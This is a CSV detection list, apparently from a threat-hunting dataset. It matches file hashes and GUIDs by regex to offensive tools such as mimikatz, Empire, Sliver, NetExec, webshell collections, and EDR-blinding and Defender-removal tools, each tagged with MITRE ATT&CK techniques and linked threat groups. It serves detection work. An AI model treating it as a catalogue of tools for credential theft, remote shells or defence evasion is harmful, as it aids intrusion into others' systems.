"*f3c663ef1bce5e962682a498edaeee56b0a68bfd29e193a3e380f1a350b75349*",".{0,1000}f3c663ef1bce5e962682a498edaeee56b0a68bfd29e193a3e380f1a350b75349.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","43916"
"*f3cb64050cf5adc95cb438a2484346f06b2beca9599d1c5717fd93af759aace9*",".{0,1000}f3cb64050cf5adc95cb438a2484346f06b2beca9599d1c5717fd93af759aace9.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","43917"
"*f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd*",".{0,1000}f3e108c7993b8d46c832ac2499a97395cc18fc9c4c1656acc25c969c7090ffcd.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","43920"
"*f3e392c770e87e69c6af2d3e83bd4b6190e6e09ce4aa4a681316dbb11582e1b3*",".{0,1000}f3e392c770e87e69c6af2d3e83bd4b6190e6e09ce4aa4a681316dbb11582e1b3.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","43921"
"*f3f0056b4e4777cf4f9a9e1111180dd2ce0111cb2e1a5b2c1a98197c4ed27035*",".{0,1000}f3f0056b4e4777cf4f9a9e1111180dd2ce0111cb2e1a5b2c1a98197c4ed27035.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43923"
"*f3f1e7ecb0fbc06203f6300861cca295e2de0a1a2f636e4d6dcc2ac651f40acf*",".{0,1000}f3f1e7ecb0fbc06203f6300861cca295e2de0a1a2f636e4d6dcc2ac651f40acf.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","43924"
"*f3f65e89ca224b5217cf6869fb4cdb3744f7ac998ccc8aa234706aa88042770b*",".{0,1000}f3f65e89ca224b5217cf6869fb4cdb3744f7ac998ccc8aa234706aa88042770b.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43927"
"*f3fa1708ff76cf83f28c5967402f55c2e7b744275932f8e457ed4f53e213bd66*",".{0,1000}f3fa1708ff76cf83f28c5967402f55c2e7b744275932f8e457ed4f53e213bd66.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43928"
"*F3FEBDE7-FBC8-48EC-8F24-5F33B8ACFB2A*",".{0,1000}F3FEBDE7\-FBC8\-48EC\-8F24\-5F33B8ACFB2A.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","43929"
"*f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88*",".{0,1000}f401f7bdae8094f273ab86529a90d93a192fed69897b908d1f5cc94f625b6b88.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43930"
"*f4029b49066c2eaacff2b8ff2cc6b0c2869720666d21432eb080c489a261678c*",".{0,1000}f4029b49066c2eaacff2b8ff2cc6b0c2869720666d21432eb080c489a261678c.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","43932"
"*f4081a8e30f75d46.js*",".{0,1000}f4081a8e30f75d46\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","43934"
"*f4108e2e049af683395a2cff2dd6ab62bfbbf06da9e5e82e64fc62525a8c56ee*",".{0,1000}f4108e2e049af683395a2cff2dd6ab62bfbbf06da9e5e82e64fc62525a8c56ee.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43935"
"*f41834034f704e3f0a17ed534124e31052ffd449de3be29d287faf4933ce7c1b*",".{0,1000}f41834034f704e3f0a17ed534124e31052ffd449de3be29d287faf4933ce7c1b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","43938"
"*f41c644ef625686c3452ad0a39350301dbae543d3fa0f552c5a62248c99b1db0*",".{0,1000}f41c644ef625686c3452ad0a39350301dbae543d3fa0f552c5a62248c99b1db0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43939"
"*f42046227f0809a1311ad6b7cd6a904b84343ef4ecb426598ce356199720594d*",".{0,1000}f42046227f0809a1311ad6b7cd6a904b84343ef4ecb426598ce356199720594d.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","43940"
"*f4257657ae5bf141b31cd56db96ac003687be4eb404d1245e27256307e0b5d35*",".{0,1000}f4257657ae5bf141b31cd56db96ac003687be4eb404d1245e27256307e0b5d35.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43941"
"*f42662aa9fb2d7cb0c9a73d21efff24dbe1051497795776c9a37f47f978fc57f*",".{0,1000}f42662aa9fb2d7cb0c9a73d21efff24dbe1051497795776c9a37f47f978fc57f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43942"
"*f42adcec359a40b1ab437ac635977f99e81848c453abc16f0d015c3d62cff7f6*",".{0,1000}f42adcec359a40b1ab437ac635977f99e81848c453abc16f0d015c3d62cff7f6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43943"
"*f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588*",".{0,1000}f4309ce07f27a76e253734d7b4b99159aad92445dd653b5dd96e3e76c9905588.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","43945"
"*f43d2a38f8e8ec7033006cc51efd0e596801579838059178042db1bcb295d131*",".{0,1000}f43d2a38f8e8ec7033006cc51efd0e596801579838059178042db1bcb295d131.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","43948"
"*f43e8c0cc98b12f28a0aa3548d67c78856c13292bfb06ecdfcbba5caefa9fef0*",".{0,1000}f43e8c0cc98b12f28a0aa3548d67c78856c13292bfb06ecdfcbba5caefa9fef0.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#filehash","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","43949"
"*f44025a2d9ed6c009219a7e8f00e28b00bb2494c4aafc7def798957073ffd1b7*",".{0,1000}f44025a2d9ed6c009219a7e8f00e28b00bb2494c4aafc7def798957073ffd1b7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","43950"
"*f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b*",".{0,1000}f44103b0e97b84c0381f234744a0a2aa2bf79cc884ee9526dbab8f9d674bc17b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43951"
"*f44118e8d6e227dea16f78d905178cf64ef019a5145aebc06d04d41ea5fc6482*",".{0,1000}f44118e8d6e227dea16f78d905178cf64ef019a5145aebc06d04d41ea5fc6482.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43952"
"*f44b640e28904ebbaa8ec1b8f44f51b06c36433f8a1f448cc3364f8f2f0710eb*",".{0,1000}f44b640e28904ebbaa8ec1b8f44f51b06c36433f8a1f448cc3364f8f2f0710eb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43954"
"*f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7*",".{0,1000}f44bdc821e6588197e6d1b868a60aa140f20971a6eaeeb9e2a52bdb4065b7fd7.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","#filehash","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","43955"
"*f44f9465e65c790de6dd15f47e19e9f555c0e9aefa0194127ebea6e89dabcf0d*",".{0,1000}f44f9465e65c790de6dd15f47e19e9f555c0e9aefa0194127ebea6e89dabcf0d.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","43956"
"*f45212661e27ef359bff3c919d7f6ac16517484e650bab99eecc29866f021dcf*",".{0,1000}f45212661e27ef359bff3c919d7f6ac16517484e650bab99eecc29866f021dcf.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","43957"
"*f458f32e49cf7c57bd3bd32e9c82217f2faab412155c9e2a7c28d1b1b4848c42*",".{0,1000}f458f32e49cf7c57bd3bd32e9c82217f2faab412155c9e2a7c28d1b1b4848c42.{0,1000}","offensive_tool_keyword","RustPotato","A Rust implementation of GodPotato - abusing SeImpersonate to gain SYSTEM privileges","T1134.001 - T1055.011","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/RustPotato","1","0","#filehash","N/A","10","1","0","0","2025-01-06T18:10:17Z","2025-01-06T19:44:57Z","43959"
"*f45e8e11a4c9817e0742a79e7753377b944ef887824f94dab1cc2fa7e4771795*",".{0,1000}f45e8e11a4c9817e0742a79e7753377b944ef887824f94dab1cc2fa7e4771795.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","43960"
"*f463d3fbb08ed690d8d2429874bf6d36d9ac0d8e74a06439586fb4f49cbe8eac*",".{0,1000}f463d3fbb08ed690d8d2429874bf6d36d9ac0d8e74a06439586fb4f49cbe8eac.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","#filehash","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","43961"
"*f4653728eb40feedcce8ea91c19f00403651514c1c82c9c34c2b5e6ffb4bc7a9*",".{0,1000}f4653728eb40feedcce8ea91c19f00403651514c1c82c9c34c2b5e6ffb4bc7a9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","43962"
"*f4720596cdfd58bfde9ea3d21d676a3fb5722bf838007848fea8b7d9584dec8a*",".{0,1000}f4720596cdfd58bfde9ea3d21d676a3fb5722bf838007848fea8b7d9584dec8a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43965"
"*f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b*",".{0,1000}f47ae40fa2ba9ad689d59f8b755ea68e116c3dd603d6f985a7eff273ce0f381b.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#filehash","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","43966"
"*f48066e445511c7fa86f1463c6e539a2f64037051e8e4410497d6df1eb3f75ad*",".{0,1000}f48066e445511c7fa86f1463c6e539a2f64037051e8e4410497d6df1eb3f75ad.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","43968"
"*f4830ceea028f835f721ec2f9c84ba6d23f516be5f02aa6f53d60611fb730925*",".{0,1000}f4830ceea028f835f721ec2f9c84ba6d23f516be5f02aa6f53d60611fb730925.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","43969"
"*f48518cafb0be8696453cbb6c92dda93d76f5f67d919bd6a21e246fd68ca61b5*",".{0,1000}f48518cafb0be8696453cbb6c92dda93d76f5f67d919bd6a21e246fd68ca61b5.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43971"
"*f486fde54c5097d60c133cc75964c652d13d18dd441ea32d76fb3395327871a0*",".{0,1000}f486fde54c5097d60c133cc75964c652d13d18dd441ea32d76fb3395327871a0.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","43972"
"*f487a8b9f72e87a862c6380d316e93dc4bd0a7e7087d6f430e369885db1d5d3d*",".{0,1000}f487a8b9f72e87a862c6380d316e93dc4bd0a7e7087d6f430e369885db1d5d3d.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","43973"
"*f48f922e798e359c11c2692385b842a17bac0ace63e818732afc8efec71502de*",".{0,1000}f48f922e798e359c11c2692385b842a17bac0ace63e818732afc8efec71502de.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","43974"
"*f490212b9f643dee26d7d2f54b4f20d0816fe6a8ee4ac59020ec46ed09e7ea4a*",".{0,1000}f490212b9f643dee26d7d2f54b4f20d0816fe6a8ee4ac59020ec46ed09e7ea4a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","43975"
"*f49651f69f442cc4e54941b1bbfa53c3bf2680e889963dc1e2b3e8cb82695b09*",".{0,1000}f49651f69f442cc4e54941b1bbfa53c3bf2680e889963dc1e2b3e8cb82695b09.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","43977"
"*f4a493d7a8c194fa599d23d6302a5bd7092fe01a60d7803688546b8cb68d8bf4*",".{0,1000}f4a493d7a8c194fa599d23d6302a5bd7092fe01a60d7803688546b8cb68d8bf4.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","#filehash","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","43980"
